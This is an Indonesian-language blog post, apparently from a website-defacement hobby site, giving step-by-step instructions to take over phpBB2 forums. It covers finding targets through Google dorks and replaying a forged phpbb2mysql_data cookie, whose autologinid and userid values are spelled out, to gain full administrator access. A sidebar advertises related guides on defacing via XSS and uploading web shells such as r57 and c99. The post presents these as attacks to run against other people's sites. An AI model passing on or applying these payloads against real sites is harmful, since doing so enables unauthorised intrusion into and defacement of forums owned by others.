Langkah-Langkah
Deface PHPBB/PHPBB2
Loser_cs_20
1. Download browser
Mozilla FireFox
2. Download pluginnya
yg bernama
LiveHTTPHeader
download di http://
livehttpheaders.
mozdev.org/
installation.html
cari yg paling baru
3. selanjutnya cari
target dengan Uncle
Google dgn syntax :
phpBB site:[terserah
apa aja]
4. setelah itu buka
plugin yg kita
download tadi di Tools
-> LiveHTTPHeader
5. Ingat, isi
LiveHTTPHeader harus
kosong
6. buka situs target,
dengan begitu
LiveHTTPHeader akan
mengambil semua
cookie yg tercatat di
halaman target
7. setelah halaman
sukses terbuka ditandai
dengan tanda "done" di
bawah browser,
langkah selanjutnya
adalah mengklik
LiveHTTPHeader di
bagian tengahnya
dilanjutkan mengklik
opsi Replay..
8. setelah
LiveHTTPReplay
terbuka liat bagian
seperti dibawah ini
pada LiveHTTPReplay...
Cookie:
phpbb2mysql_data=a
%3A0%3A%7B%7D;
phpbb2mysql_sid=88
da2bbdc1a3a789df094
d50d91f7e3b
9. Hapus bagian yg
belakang setelah tanda
semi colon (
Cookie:
phpbb2mysql_data=a
%3A0%3A%7B%7D;
phpbb2mysql_sid=88
da2bbdc1a3a789df094
d50d91f7e3b
\_______________hapus
bagian
ini_________________/
jadinya akan seperti ini :
Cookie:
phpbb2mysql_data=a
%3A0%3A%7B%7D
10. lalu klik replay lagi,
sehingga halaman
target akan mereload
semua perintah cookie
yg telah kita manipulasi
11. selanjutnya
perhatikan langkah di
bawah ini:
Cookie:
phpbb2mysql_data=a
%3A0%3A%7B%7D
\________hapus bagian
ini dan di ganti dengan:
Cookie:
phpbb2mysql_data=a:2
{s:11:"autologinid";s:32:"
602baahpepms74d4cb
6f2d012e1e4019";s:6:"
userid";s:1:"2";}
12. lalu klik replay lagi,
sehingga halaman
target akan mereload
semua perintah cookie
yg telah kita manipulasi
tadi.
13. perhatikan lagi
langkah ini:
Cookie:
phpbb2mysql_data=a:2:
{s:11:"autologinid";s:32:"
602baahpepms74d4cb
6f2d012e1e4019";s:6:"
userid";s:1:"2";}
\__________________________
_bagian ini jg digantilagi
_______________
________________/
menjadi seperti ini:
Cookie:
phpbb2mysql_data=a
%3A2%3A%7Bs
%3A11%3A
%22autologinid
%22%3Bb%3A1%3Bs
%3A6%3A%22userid
%22%3Bs%3A1%3A
%222%22%3B%7D
14. lalu klik replay lagi,
sehingga halaman
target akan mereload
semua perintah cookie
yg telah kita manipulasi
tadi.
15. selesai, silakan liat
halaman target, kalo
anda beruntung anda
mendapatkan full
admin.
Silakan pergi ke bawah
halaman dan lihat opsi
"Go To Administration
Panel" telah muncul
Popular Posts
-
Siang sob ^_^ Sebenernya gw binggung mau nge-share apa :v Yaudah deh mending gw share cara Deface Website dengan teknik XSS Vulnerability ~ ... -
Oke jumpa lagi dengan saya... hehehe. Kali ini mau share seddikit trik deface ala newbie dengan dorking shell. Biasa nya defacer memasang s... -
Assalamuallaikum halo ^_^ saya balik lagi saya dapet hadiah :v wkwkwk iseng2 uplek2 sendiri domain sch.id eh dapet trick :p langsung saja D... -
Halo ^_^ kali ini saya mau share tentang Shell backdor :v langsung saja 1. R57 Shell Download 2. C99 Shell Download 3. B374K Shell Download... -
Malam Sob \ :v / Nih gw mau share Cara Deface Web Dengan Silentum Uploader ~ Lansung saja ~ Masukin salah satu Dork ini di Google: intext: P... -
Assalamuallaikum ^_^ kali ini saya mau berbagi cara memasukan kode lagu (lagu) dalam script deface atau HTML pasti bosen kan tanpa lagu :v w... -
Assalamuallaikum :) maaf ya jika saya jarang post :v wkwkwkwk maklum lagi nyari2 bug :v siapa tau nemu anu kali ini saya mau berbagi cara up... -
Langsung ajah :D Pada tutorial saya kali ini, saya akan shere bagaimana cara mengupload shell ke web joomla. Alat dan bahan - Shell (... -
DEFACE Secara singkat Deface adalah kegiatan untuk mengganti ataupun merubah tampilan halaman depan sebuah situs, Teknik ini biasa di lakuka... -
Teknik ini sebenarnya sudah lama sekali ~ Teknik ini sangat mudah sekali jadi cocok untuk para newbie yang ingin belajar deface termasuk ...
0 comments:
Post a Comment